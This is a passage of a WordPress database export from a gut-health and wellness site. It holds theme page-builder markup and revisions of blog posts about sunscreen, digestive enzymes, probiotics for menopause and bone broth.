css=\".vc_custom_1519140627330{padding-top: 144px !important;padding-bottom: 0px !important;}\" parallax_background_image=\"2278\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"164\" image_size=\"full\"][vc_column_text]\n

Make Every Bite Count

\n[/vc_column_text][vc_empty_space height=\"35px\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 26% 150px 26%\" item_padding_768_1024=\"0 16% 164px 16%\" item_padding_680_768=\"0 4% 186px 4%\" item_padding_680=\"0 0% 150px 0%\"][contact-form-7 id=\"159\" html_class=\"cf7_custom_style_1\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column offset=\"vc_col-lg-5 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"120px 10px 110px 0px\" item_padding_680_768=\"120px 10px 0px 0px\" item_padding_768_1024=\"120px 10px 55px 0px\" item_padding_680=\"100px 0px 28px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"184\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-7 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"99px 0px 0px 0px\" item_padding_680=\"0px 0px 100px 0px\" item_padding_680_768=\"48px 0px 100px 0px\" item_padding_768_1024=\"0px 0px 103px 0px\"][vc_column_text]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516618148023{margin-top: -11px !important;}\"]\n

Detox Plan SEVEN

\n[/vc_column_text][vc_empty_space height=\"6px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Mauris porta euismod lectus, finibus viverra dolor congue vitae. Integer ornare vulputate nunc et semper. Pellentesque consequat erat eros, sed maximus eros luctus eget, unc dapibus.[/vc_column_text][vc_empty_space height=\"18px\"][qodef_progress_bar title_tag=\"\" percent=\"38\" title=\"Aloe Shots\"][qodef_progress_bar title_tag=\"\" percent=\"53\" title=\"Smoothies\"][qodef_progress_bar title_tag=\"\" percent=\"67\" title=\"Veggie Wraps\"][qodef_progress_bar title_tag=\"\" percent=\"81\" title=\"Supplements\"][vc_empty_space height=\"49px\"][qodef_single_image enable_image_shadow=\"no\" image=\"291\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1519125692374{padding-top: 82px !important;padding-bottom: 73px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h1-img10.jpg?id=2753) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3414\" image_size=\"full\" title=\"Detox Diet\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"1\"][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3415\" image_size=\"full\" title=\"Strong Excercize\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"2\"][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3412\" image_size=\"full\" title=\"Deep Hydration\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"3\"][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"2285\" css=\".vc_custom_1518176405299{padding-top: 57px !important;padding-bottom: 132px !important;}\"][vc_column][qodef_testimonials skin=\"light\" show_title=\"no\" show_image=\"no\" show_icon=\"yes\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"no\" slider_pagination=\"yes\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519124684606{padding-top: 88px !important;padding-bottom: 112px !important;}\"][vc_column][qodef_product_list number_of_columns=\"4\" space_between_items=\"tiny\" orderby=\"title\" order=\"ASC\" taxonomy_to_display=\"id\" image_size=\"\" number_of_posts=\"8\" taxonomy_values=\"1099, 1100, 1102, 1103, 1104, 1105, 1106, 1107\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"245\" css=\".vc_custom_1519121697188{padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"23px 20px 60px 0px\" item_padding_680=\"100px 0px 0px 0px\" item_padding_680_768=\"100px 0 0 0\" item_padding_768_1024=\"100px 123px 0px 0px\" item_padding_1024_1280=\"0px 0% 23px 84px\"][vc_column_text css_animation=\"none\"]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516615809885{margin-top: -10px !important;}\"]\n

Organic Soap

\n[/vc_column_text][vc_empty_space height=\"8px\"][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.[/vc_column_text][vc_empty_space height=\"28px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"130px 0px 99px 88px\" item_padding_680=\"50px 0px 90px 0px\" item_padding_680_768=\"71px 0 100px 0px\" item_padding_768_1024=\"77px 0px 100px 0px\"][qodef_video_button video_link=\"https://vimeo.com/28781336\" video_image=\"246\" play_button_size=\"20px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519124340678{padding-top: 85px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"166\" image_size=\"full\"][vc_empty_space height=\"13px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" title=\"Vegan Blogging\" subtitle=\"SWEET & HEALTY FOOD\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519124473237{padding-bottom: 63px !important;}\"][vc_column][vc_empty_space height=\"60px\"][qodef_blog_list type=\"standard\" number_of_columns=\"3\" space_between_items=\"small\" orderby=\"date\" order=\"DESC\" image_size=\"full\" number_of_posts=\"3\" category=\"pure\" excerpt_length=\"19\"][/vc_column][/vc_row]','Main Home','','inherit','closed','closed','','10-revision-v1','','','2023-08-24 16:15:12','2023-08-24 16:15:12','',10,'https://tummyrevolution.com/?p=5439',0,'revision','',0),(5716,3,'2023-10-11 12:49:49','2023-10-11 12:49:49','\n

The best sunscreens for health are those that provide effective protection against the harmful effects of the sun\'s ultraviolet (UV) rays while minimizing potential risks associated with certain sunscreen ingredients.

\n\n\n\n

Here are some key factors to consider when choosing a sunscreen for optimal health:

\n\n\n\n

Broad-Spectrum Protection: Look for a sunscreen labeled as \"broad-spectrum,\" which means it offers protection against both UVA and UVB rays. UVA rays can prematurely age the skin, while UVB rays are responsible for sunburn.
SPF level, (Sun Protection Factor) of at least 30. SPF 30 provides strong protection, and SPF 50 offers even higher protection. To maintain protection for a longer duration choose a
Water-Resistant Sunscreen, and be sure to reapply after swimming or sweating as indicated on the label.
Fragrance-Free, which is a good Option for Sensitive Skin, Fragrances can sometimes cause skin irritation or allergies.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

Sunscreen Face Lotion, Link To Recommended Product.

\n\n\n\n

These Products are, Reef-Friendly: Some chemical sunscreen ingredients, like oxybenzone and octinoxate, can harm coral reefs. If you plan to swim in the ocean, consider a sunscreen labeled as \"reef-friendly\" or \"ocean-safe\" that doesn\'t contain these harmful chemicals.

\n\n\n\n

\n\n\n\n\"\"\n\n\n\n

Sunscreen face Lotion, Link to Recommended Product

\n\n\n\n

This Product contains Minerals: This Mineral sunscreens has zinc oxide as their active ingredients. These ingredients provide physical (rather than chemical) protection by sitting on the skin\'s surface and reflecting or scattering UV rays. It is generally considered safe and are less likely to cause skin irritation.

\n\n\n\n\"\"\n\n\n\n

Sunscreen Bodylotion For Sensitive Skin Type, Link to Recommended Product

\n\n\n\n

This Products is also Reef-Friendly: Some chemical sunscreen ingredients, like oxybenzone and octinoxate, can harm coral reefs. If you plan to swim in the ocean, consider a sunscreen labeled as \"reef-friendly\" or \"ocean-safe\" that doesn\'t contain these harmful chemicals.

\n\n\n\n\"\"\n\n\n\n

Sunscreen Bodylotion For Sensitive Skin Type - Link to Recommended Product

\n\n\n\n

This Products is also Reef-Friendly: Some chemical sunscreen ingredients, like oxybenzone and octinoxate, can harm coral reefs. If you plan to swim in the ocean, consider a sunscreen labeled as \"reef-friendly\" or \"ocean-safe\" that doesn\'t contain these harmful chemicals.

\n\n\n\n\"\"\n\n\n\n

Dermatologist-Recommended: Consult with a dermatologist to get personalized sunscreen recommendations, especially if you have specific skin concerns or conditions.

\n\n\n\n

Remember that the best sunscreen for health is one that you will use consistently. Applying sunscreen generously and regularly, seeking shade when necessary, and wearing protective clothing (such as wide-brimmed hats and sunglasses) are all important components of sun protection for your skin\'s health.

\n','Best Sunscreens for Sensitive Skin Type to Maintain Good Health','','publish','open','open','','best-sunscreens-for-sensitive-skin-type-to-maintain-good-health','','','2023-10-11 12:55:24','2023-10-11 12:55:24','',0,'https://tummyrevolution.com/?p=5716',0,'post','',0),(5447,1,'2023-09-12 06:14:36','2023-09-12 06:14:36','Understanding enzymes and how they work to improve your health','Why take Enzymes?','How does enzymes work','inherit','open','closed','','enzymer','','','2023-10-12 09:06:42','2023-10-12 09:06:42','',5446,'http://tummyrevolution.com/wp-content/uploads/2023/09/Enzymer.jpg',0,'attachment','image/jpeg',0),(5448,1,'2023-09-12 06:16:39','2023-09-12 06:16:39','','diana-polekhina-v0ZjnfxnP60-unsplash','','inherit','open','closed','','diana-polekhina-v0zjnfxnp60-unsplash','','','2023-09-12 07:28:23','2023-09-12 07:28:23','',5446,'http://tummyrevolution.com/wp-content/uploads/2023/09/diana-polekhina-v0ZjnfxnP60-unsplash.jpg',0,'attachment','image/jpeg',0),(5449,1,'2023-09-12 06:22:44','2023-09-12 06:22:44','','Pienapple and enzymes','','inherit','open','closed','','pienapple-and-enzymes','','','2023-09-12 06:22:44','2023-09-12 06:22:44','',5446,'http://tummyrevolution.com/wp-content/uploads/2023/09/Pienapple-and-enzymes.jpg',0,'attachment','image/jpeg',0),(5451,1,'2023-09-12 06:28:11','2023-09-12 06:28:11','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n
\n','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-12 06:28:11','2023-09-12 06:28:11','',5446,'https://tummyrevolution.com/?p=5451',0,'revision','',0),(5450,1,'2023-09-12 06:25:41','2023-09-12 06:25:41','\n
\n

Introduction

\n\n\n\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n
\n','Title: Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-12 06:25:41','2023-09-12 06:25:41','',5446,'https://tummyrevolution.com/?p=5450',0,'revision','',0),(5456,1,'2023-09-12 07:00:22','2023-09-12 07:00:22','','The Best Probiotics to Support Your Gut Health DURING Menopause','','inherit','open','closed','','the-best-probiotics-to-support-your-gut-health-during-menopause','','','2023-09-12 07:00:22','2023-09-12 07:00:22','',0,'http://tummyrevolution.com/wp-content/uploads/2023/09/The-Best-Probiotics-to-Support-Your-Gut-Health-DURING-Menopause-.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5459,1,'2023-09-12 07:28:57','2023-09-12 07:28:57','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Lactobacillus rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Lactobacillus casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Saccharomyces boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

In summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n\n\n\n

\n','The Best Probiotics to Support Your Gut Health During Menopause','','draft','open','open','','the-best-probiotics-to-support-your-gut-health-during-menopause-2','','','2023-10-10 14:08:59','2023-10-10 14:08:59','',0,'https://tummyrevolution.com/?p=5459',0,'post','',0),(5460,1,'2023-09-12 07:28:57','2023-09-12 07:28:57','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another. That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Lactobacillus rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Lactobacillus casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Saccharomyces boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

In summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health During Menopause','','inherit','closed','closed','','5459-revision-v1','','','2023-09-12 07:28:57','2023-09-12 07:28:57','',5459,'https://tummyrevolution.com/?p=5460',0,'revision','',0),(5463,1,'2023-09-12 07:35:05','2023-09-12 07:35:05','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n
\n','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-12 07:35:05','2023-09-12 07:35:05','',5446,'https://tummyrevolution.com/?p=5463',0,'revision','',0),(5462,1,'2023-09-12 07:32:12','2023-09-12 07:32:12','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another. That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Lactobacillus rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Lactobacillus casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Saccharomyces boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

In summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n\n\n\n

\n','The Best Probiotics to Support Your Gut Health During Menopause','','inherit','closed','closed','','5459-revision-v1','','','2023-09-12 07:32:12','2023-09-12 07:32:12','',5459,'https://tummyrevolution.com/?p=5462',0,'revision','',0),(5464,1,'2023-09-12 09:11:02','2023-09-12 09:11:02','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.
Skip to list of top Bone Broth available to buy here

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

